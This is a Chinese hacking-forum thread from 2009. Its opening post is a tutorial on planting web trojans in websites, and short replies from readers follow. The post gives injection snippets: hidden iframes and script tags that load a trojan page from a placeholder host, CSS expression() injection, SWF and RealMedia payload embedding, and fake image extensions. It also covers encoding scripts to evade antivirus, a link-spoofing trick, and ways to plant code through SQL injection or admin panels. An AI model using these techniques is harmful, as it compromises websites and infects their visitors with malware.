WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 4101查看
  • 17回复

主题

好友

2746

积分

金牌会员

发表于 2009-5-8 09:08:36 |显示全部楼层
1,挂马的N种方法

    (1) HTML挂马法。
    常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0></iframe>。查看站点是否被挂,一般是查找一下关键词iframe。

    (2) 再隐藏一点的就是js挂马了。
    像再原来的网页中写入<script str=http://www.xxx.com/horse.js></script>,horse里的js写法一般为document.write('http:\/\/www.xxx.com\/horse.html'>;,或者专业一点的写法是top.document.body.innerHTML  = top.document.body.innerHTML + '\r\n<inframe src="http://www.xxx.com/horse.htm/"></iframe>';。不过第2种写法要注意:是原来的网页种要有body标签。

    (3) 在 css中挂马。
    这个方法就是在css中写入:
body {
hytop:expression(top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/horse.html/"></iframe>');
}
    然后在主页中调用这个CSS,代码类似<link href="http://www.7747.net/css.css" rel="stylesheet" type="text/css">这样的。在csdn 中对expression的解释是:IE5及其以后版本支持在CSS中使用expression,用来吧CSS属性和Javascript表达式关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性。也就是说CSS属性后面可以是一段Javasccript表达式,CSS属性的值等于Javascript表达式计算的结果。在表达式中可以是直接一用元素自身的属性和方法,也可以使用其它浏览器对象。这个表达式就好像是在这个元素的一个成员函数中一样。整个解释关键点是expression可以在css中引入js语句,所以我们可用于挂马。不过写的语句值可以远程调用,本地不可以。

    (4) 在swf中挂马
    网上有一些swf挂马的工具,可以用工具替换原来网页中的swf或单独把swf发给对方,一可以单独作一个可显示swf页的网页。在网页中插入swf的语法一般格式为:
<OBJECT classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5.0.0.0 WIDTH=760 NAME=quality VALUE=high> <EMBED src="http://www.7747.net/xxx.swf" quality=high pluginspage=http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash type=application/x-shockwave-flash width=760 height=60></EMBED></OBJECT>

    (5) 在影音文件中挂马。
    所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal&&http://www.xxx.com/horse.htm
(00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)
    输入完毕后并保存,然后依次选择“工具”-“合并事件”,导入刚才的文本。当合并完成后,依次选择“文本”-“Real文件另存为”,保存好即可。
    最后把生成的视频文件发布网上,当对方观看同时就会连接到你指定的木马地址。

2,挂马的技巧

    挂马首先要求的是隐蔽性,这样挂的时间才能长。像在SWF、JS、RM中挂马就是比较隐蔽了,但是还可再用到些技巧。

    (1)远程任意后缀执行HTML
    可以把horse.html改成horse.jpg之类的后缀,然后语句写成<iframe src=/uploadfile/200902/20090220105353594.jpg width=0 height=0></iframe>。js也可以,语句为<script src=/uploadfile/200902/20090220105353594.jpg></script>,甚至js的不要后缀名都可以。

    (2)JS的加密
    为了保护网页木马的代码,可以把JS内容加密,还能躲开杀软的作用。如果使用ENCODE加密方式,加密后的JS调用语句就用<scriptlanguage="jscript".encode"src=http://www.xxx.com/horse.txt></script>。除此方法外,还有其它更多的方法!

    (3)URL的变形
    URL的变形方法也有很多,例如将url的16进制转换为encod编码等。如果是涉及到URL欺骗的方法就更多了,不过多数的URL欺骗,像利用@的技巧,IE都已经打补丁了。但现在有个漏洞仍然有效,代码如下:
<a id="CZY" href="http://www.baidu.com"></a>
<div>
<a href="http://www.google.cn" target="_blank">
<table>
<caption>
<a href="http://www.google.cn" target="_blank">
<label for="CZY">
<u style="cursor: pointer: color: blue">
Google</u>
</label></a></caption></table></a></div>
保存该代码为网页后,鼠标移动到Google这个链接上时,IE状态栏显示的是http://www.google.cn,但点击链接后却打开http://www.baidu.com网站。如果你的网马可以用IP地址访问到的话,IP地址也可以进行转换的。像127.0.0.1这样的IP还可以变为2130706433、0x7f.0x00.0x00.0x01、0177.0000.0000.0001等等,这只不过是8进制、10进制、16进制、的转换而已。

3,如何才能挂到马
    拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。

主题

好友

130

积分

注册会员

发表于 2009-6-20 14:27:22 |显示全部楼层
不是很懂。。顶了。。
回复

使用道具 举报

主题

好友

864

积分

高级会员

发表于 2009-6-20 17:54:39 |显示全部楼层
在隐秘不免杀 也没用。。。
回复

使用道具 举报

主题

好友

14

积分

新手上路

发表于 2009-6-21 17:57:49 |显示全部楼层
2# 204lihai


教些简单的 好吗。。。菜鸟能看懂的
回复

使用道具 举报

主题

好友

138

积分

注册会员

发表于 2009-6-30 15:00:50 |显示全部楼层
是啊,能不能发些入门级的
回复

使用道具 举报

主题

好友

38

积分

新手上路

发表于 2009-7-11 10:47:00 |显示全部楼层
挂马自然是很简单了
回复

使用道具 举报

主题

好友

2322

积分

荣誉贵宾

发表于 2009-7-20 09:43:22 |显示全部楼层
看不懂。不过这是好贴
回复

使用道具 举报

主题

好友

4102

积分

论坛元老

发表于 2009-8-19 21:43:32 |显示全部楼层
太多拉看不懂哈
回复

使用道具 举报

主题

好友

10

积分

新手上路

发表于 2009-11-8 16:15:51 |显示全部楼层
同情LZ,其实我也不知道怎么说会更简单了
回复

使用道具 举报

主题

好友

254

积分

中级会员

发表于 2009-12-21 23:16:28 |显示全部楼层
不懂诶。。。
回复

使用道具 举报

主题

好友

3946

积分

论坛元老

发表于 2009-12-26 13:06:38 |显示全部楼层
感觉好深奥啊,看不懂
回复

使用道具 举报

主题

好友

20

积分

禁止发言

发表于 2010-1-27 03:35:33 |显示全部楼层
本帖最后由 哥自横刀向天笑 于 2010-5-9 15:21 编辑

违规内容!
回复

使用道具 举报

主题

好友

196

积分

注册会员

发表于 2010-1-28 15:19:27 |显示全部楼层
完全看不懂吖。
回复

使用道具 举报

主题

好友

196

积分

注册会员

发表于 2010-1-28 15:35:03 |显示全部楼层
慢慢研究研究。
回复

使用道具 举报

主题

好友

98

积分

注册会员

发表于 2010-5-25 10:23:59 |显示全部楼层
虽然没看懂,但是每一次都是一次提升,谢谢楼主分享,留贴纪念。
回复

使用道具 举报

主题

好友

896

积分

高级会员

发表于 2011-6-17 12:14:41 |显示全部楼层
看不明白,拿分走人!!!
回复

使用道具 举报

主题

好友

40

积分

新手上路

发表于 2011-9-11 04:22:05 |显示全部楼层
作为一个新人,我发现要看到更有用的帖子,必须权限要高,所以我每看一个帖子,都会顶一下,这样权限就慢慢的高了
回复

使用道具 举报

主题

好友

28

积分

新手上路

发表于 2012-1-8 02:33:37 |显示全部楼层
好好学习天天向上
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-26 19:31 , Processed in 0.098000 second(s), 17 queries .

返回顶部